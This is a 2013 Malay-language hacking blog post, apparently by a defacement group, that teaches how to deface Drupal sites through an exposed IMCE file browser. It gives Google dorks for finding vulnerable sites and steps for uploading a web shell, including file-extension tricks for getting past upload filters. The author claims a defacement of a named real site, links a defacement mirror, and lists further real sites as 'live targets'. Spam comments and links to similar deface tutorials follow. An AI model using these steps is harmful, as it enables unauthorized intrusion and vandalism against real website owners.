Monday, 11 March 2013

Drupal IMCE Mkdir Remote File Upload

 By: Afif    02:15  , , , ,    2 comments
Deface dengan exploit drupal deface


Assalamualaikum dan salam sejahtera.Dah lama aku tak buat post exploit deface kan? Ok hari ini aku nak ajar korang satu exploit deface di bawah platform Drupal.

Sebenarnya exploit ni dah lama tapi masih banyak website yang terdedah kepada exploit ni termasuk web yang baru-baru :D

OK jom mula~

1. Mula-mula cari web vuln dengan google dork :
inurl:"/imce?dir="
intitle:"File Browser"

 note : ubah2 dork untuk dapat bnyak web :D

2. Kemudian buka website yang korang dapat dari google.
Akan keluar paparan macam ini :



Ok korang tengok di sebelah kiri web tu, ada folder2.Korang boleh ubah nak upload masuk folder mana.Tapi lebih baik ambil folder yang atas sekali iaitu files.

 atau tukar hujung link website jadi /imce?dir=.

3. Kemudian klik UPLOAD dan pilih la file shell korang!
Extension yang dibenarkan : .php/.html/.pgs/.asp/shell.asp;me

 Extension ni bergantung kepada website.ada yang boleh ada yang tak boleh.Korang tukar2 nama shell untuk bagi lepas :D

4. Selepas dah berjaya upload, untuk tengok hasil macam ni :

http://target.com/files/shell.php
http://target.com/path/shell.php

 note : /path/ tu ikut kepada website.dia lain2 nama dia.ada yang tak ada dan ada yang ada.


Ok ini hasil yang aku dapat :

http://astronutrition.com/blog/files/reaperz.html
Mirror :
http://legend-h.org/deface.php?id=858072

 Live Target :
http://astronutrition.com/blog/imce?dir=.
http://www.arcireal.com/imce?dir=.
http://www.worldagroforestry.org/imce?dir=.

dan banyak lagi kat google :D


Ok sampai sini saja tutorial kali ini.semoga berjaya depes...
Item Reviewed: Drupal IMCE Mkdir Remote File Upload Description: Rating: 5 Reviewed By Afif

Share:
Posted by at
Labels: , , , ,

2 comments:

  1. Anonymous1 April 2013 at 20:11

    We have been using internet banking for
    quiet sometimes now. Getting professional help early on, through
    intensive therapy and even law enforcement if necessary,
    is essential to the child's success with treatment and preventing him from harming another child. The very best approach to marketing the services you receive or items would be to come up with them as nobody will purchase your items if they do not know what they're or what they will get for his or her money.

    ReplyDelete
  2. danish7 June 2021 at 09:04

    I felt very happy while reading this site. This was really very informative site for me. I really liked it. This was really a cordial post. Thanks a lot!. kissanime

    ReplyDelete

Subscribe to: Post Comments (Atom)

Popular Posts

  • Senarai Laman Web Download Movie!
    Assalamualaikum dan salam sejahtera.Entry kali ini aku nak share satu benda yang best!Aku nak share dengan korang senarai mega website ...
  • Powered By Geeklog - Upload File Deface
    Assalamualaikum dan salam sejahtera...memandangkan mata ni belum bole lelap....aku nak sediakan satu tutorial deface untuk korang.Ianya ...
  • 3 Cara Nak Lajukan Internet
    Assalamualaikum dan salam sejahtera. Hari ni aku nak share 3 cara nak lajukan internet korang.Suka? Mestilah suka kan :P Ketiga-tiga cara n...
© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com